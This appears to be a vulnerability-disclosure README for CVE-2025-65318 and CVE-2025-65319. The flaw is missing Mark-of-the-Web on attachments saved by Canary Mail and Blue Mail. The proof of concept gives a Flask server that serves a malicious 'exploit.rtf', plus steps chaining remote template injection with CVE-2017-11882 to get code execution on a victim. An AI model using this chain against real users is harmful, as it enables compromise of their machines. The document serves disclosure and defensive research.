# PoC for CVE-2025-65318 and CVE-2025-65319
- **CVE-2025-65318** (**BDU:2025-13740**):
  When using the attachment interaction functionality, **Canary Mail** 5.1.40 and below saves documents to a file system without a Mark-of-the-Web tag, which allows attackers to bypass the built-in file protection mechanisms of both Windows OS and third-party software.
- **CVE-2025-65319** (**BDU:2025-13739**):
  When using the attachment interaction functionality, **Blue Mail** 1.140.103 and below saves documents to a file system without a Mark-of-the-Web tag, which allows attackers to bypass the built-in file protection mechanisms of both Windows OS and third-party software.
# Overview
The core issue is not that users open malicious attachments, but that apps like Canary Mail or Blue Mail provide a convenient yet insecure feature for saving or opening them. I consider this a security vulnerability that exposes users to attackers.
## CWE-693 - Protection Mechanism Failure
# PoC
To demonstrate the insecure opening of Office Word attachments via the "Open with" or "Save as" dialog box, vulnerability CVE-2017-11882 in the equation editor for Office Word 16 and below was used.
1.  Create a malicious RTF object on the attacker's host that opens a calculator on the host using [the script](https://github.com/rip1s/CVE-2017-11882).
2.  Deploy a server to send a malicious RTF document using Remote Template Injection.
```
from flask import Flask, send_file, request
import logging
from datetime import datetime

app = Flask(__name__)

# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)

@app.before_request
def log_request_info():
    logger.info(f'Request: {request.method} {request.url} from {request.remote_addr}')

@app.after_request
def log_response_info(response):
    logger.info(f'Response: Status {response.status_code} for {request.url}')
    return response

@app.route('/download')
def download_file():
    try:
        response = send_file('exploit.rtf', mimetype='application/msword', as_attachment=True)
        logger.info('File download successful')
        return response
    except FileNotFoundError:
        logger.error('File exploit.rtf not found')
        return 'File not found', 404

if __name__ == '__main__':
    app.run(debug=False, host='0.0.0.0', port=5000)

```
3. Create an arbitrary DOCX document and use remote template injection by running, for example, a [PowerShell script](https://github.com/nickvourd/RTI-Toolkit).
4. The attacker sends the resulting malicious DOCX document to the victim.
5. The victim opens the malicious document using the "Open with" or "Save as" functions in Canary Mail/Blue Mail.
6. When opening a malicious document, the victim can be compromised without pressing any additional buttons.

# Impact
A potential RCE for users using outdated Microsoft Office Word software versions 16 and below

# Affected Versions
- Canary Mail 5.1.40 and below
- Blue Mail 1.140.103 and below

# Video PoC
## CVE-2025-65318



https://github.com/user-attachments/assets/fc99d603-f56f-451b-a9f2-821422feef61



## CVE-2025-65319

https://github.com/user-attachments/assets/68b638b9-e906-4c78-baae-84a369f807f3



# References

- https://bdu.fstec.ru/vul/2025-13739
- https://bdu.fstec.ru/vul/2025-13740

# Disclaimer
This repository is for **educational and defensive security research only**
